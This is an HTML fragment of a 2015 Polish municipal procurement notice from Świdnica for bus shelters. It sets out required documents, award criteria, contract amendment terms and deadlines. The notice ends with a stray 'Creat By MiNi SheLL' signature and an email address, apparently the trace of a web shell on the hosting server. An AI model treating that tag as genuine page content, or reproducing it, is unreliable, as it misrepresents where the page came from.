<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">w celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego (parametry wiat przystankowych pkt. 3.5 SIWZ) do oferty należy załączyć: 
a) świadectwo bezpieczeństwa CE, 
b) znak bezpieczeństwa B, 
świadczące o spełnieniu norm bezpieczeństwa w przypadku urządzeń  niskonapięciowych stosowa-nych w miejscach publicznych, wystawione przez niezależny podmiot zajmujący się poświadczaniem zgodności instalowanych gablot z wymogami norm PN-EN 60598-1:2007 IDT EN 60598-1:2004,
c) karty katalogowe oferowanych wiat - wiaty winny być zwymiarowane dla sprawdzenia spełnienia warunków określonych w pkt 3.5.1 SIWZ (dodatkowo załączyć wymiarowanie fundamentów).</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- dowód wniesienia wadium (załącznik nr 15 do oferty Wykonawcy),
- pełnomocnictwo do podpisania oferty w przypadku, gdy ofertę podpisuje osoba (osoby nie wskazane w dokumencie rejestrowym) upoważniona do składania oświadczeń woli przez Wykonawcę (za-łącznik nr 16 do oferty Wykonawcy),
- pełnomocnictwo dla pełnomocnika składającego ofertę w ramach oferty wspólnej (załącznik nr  17 do oferty Wykonawcy)
- informację o przynależności do grupy kapitałowej w przypadku, gdy Wykonawca należy do grupy kapitałowej- załącznik G do SIWZ (załącznik nr 18 do oferty Wykonawcy),
-  kosztorys ofertowy -załącznik H do SIWZ (załącznik nr 19 do oferty Wykonawcy ,
- zaparafowany projekt umowy - załącznik I do SIWZ (załącznik nr 20 do oferty Wykonawcy).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - termin wykonania - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>2 Zamawiający przewiduje zmiany umowy wprowadzane aneksem zaakceptowanym przez obie strony w następujących przypadkach:
a) jeżeli zmiana umowy jest korzystna dla Zamawiającego (korzyść ekonomiczna, techniczna, eksplo-atacyjna),
b) jeżeli wystąpiły okoliczności, których przy dołożeniu należytej staranności strony na dzień podpisa-nia umowy przewidzieć nie mogły, a wynikają one ze zmian przepisów prawa, które nastąpiły w czasie realizacji zamówienia,
c) z powodu okoliczności siły wyższej np. wystąpienia zdarzenia losowego wywołanego przez czynni-ki zewnętrzne, którego nie można było przewidzieć, w szczególności zagrażającego
bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach. 

19.3. Zamawiającemu przysługuje prawo do natychmiastowego odstąpienia 
od umowy w przypadku:
a)  gdy zostanie ogłoszona upadłość lub rozwiązanie firmy Wykonawcy,
b)  gdy zostanie wydany nakaz zajęcia majątku Wykonawcy,
c)  jeżeli Wykonawca nie rozpoczął usługi bez uzasadnionych przyczyn, nie kontynuuje jej mimo we-zwania Zamawiającego złożonego na piśmie a przerwa w realizacji trwa dłużej niż 7 dni.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.swidnica.bip-gov.info.pl/bip/glowna<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Świdnicy, ul. Armii Krajowej 49, 58-100 Świdnica, Wydział Zamówien Publicznych i Przetargów, pok. 124, I p..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.09.2015 godzina 09:00, miejsce: Urząd Miejski w Świdnicy, ul. Armii Krajowej 49, 58-100 Świdnica, Wydział Zamówien Publicznych i Przetargów, pok. 124, I p..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com